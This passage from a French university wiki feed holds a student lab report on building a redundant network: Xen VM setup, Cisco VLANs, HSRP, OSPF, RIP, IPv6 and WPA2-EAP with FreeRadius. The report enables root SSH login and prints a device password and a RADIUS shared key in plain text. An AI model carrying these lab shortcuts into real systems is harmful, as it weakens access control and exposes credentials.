Il faut créer un fichier basique avec la commande vim par exemple, on peut écrire un mot et démonter la clé: &lt;br /&gt;
     root@zabethX:~#  umount /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Lorsqu'on échange nos clés entre deux binômes, on remarque que le processus a bien fonctionné et que lorsqu'on essaye d'accéder à la clé cette dernière est protégé par un mot de passe.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;br /&gt;
Le but est de faire en sorte que l’accès à la borne WiFi soit controlé par WPA2-EAP. L’identification va se faire en utilisant le même serveur FreeRadius que pour la sécurisation filaire.&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la configuration Wifi  :&lt;br /&gt;
 root@zabethX:~# minicom -os // Sur l'ordinateur avec la clé Wifi&lt;br /&gt;
&lt;br /&gt;
Il faut changer quelques propriétés : &lt;br /&gt;
* concernant le port : /dev/ttyUSB0, &lt;br /&gt;
* 9600 bauds&lt;br /&gt;
* Désactiver le control de flux&lt;br /&gt;
&lt;br /&gt;
Pour passer en super utilisateur : &lt;br /&gt;
 ap&amp;gt; enable &lt;br /&gt;
Il faut entrer le mot de passe :&amp;quot;Cisco&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Concernant la configuration: &lt;br /&gt;
 ap#&amp;gt; config term&lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_mycoplasma2 group radius_mycoplasma2&lt;br /&gt;
 ap(config)#&amp;gt; aaa new-model //authentication, authorization, accounting&lt;br /&gt;
 ap(config)#&amp;gt; radius-server host 193.48.57.178 auth-port 1812 acct-port 1813 key mycoplasma2&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; aaa group server radius radius_mycoplasma2&lt;br /&gt;
   ap(config-sg-radius)# server 193.48.57.178 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_group2 group radius_mycoplasma2&lt;br /&gt;
&lt;br /&gt;
* Création des SSID, protégé par la méthode WPA2-EAP :&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; dot11 ssid SSID_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# vlan 102&lt;br /&gt;
    ap(config-ssid)# authentication open eap eap_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# authentication network-eap eap_mycoplasma2&lt;br /&gt;
    ap(config-ssid)# authentication key-management wpa&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52084</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52084"/>
				<updated>2020-01-14T21:51:04Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Hosts */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
* '''SSH'''&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain se rapproche de la notion de domaine de diffusion voire VLAN avec des options plus poussés pour le filtrage et le forwarding [https://www.cisco.com/c/en/us/td/docs/routers/asr1000/configuration/guide/chassis/bdi.html  plus]. Pour permettre à notre routeur d'avoir une interface sur un bridge domaine on doit lui configurer une interface logique appelée BDI (Bridge Domain Interface) .Un routeur peut avoir plusieurs Bridge Domaines mais un Bridge Domaine n'accepte qu'une seule BDI. &lt;br /&gt;
&lt;br /&gt;
On en profite aussi pour faire notre configuration HSRP (Hot standby router protocol) [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus] et IPv6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
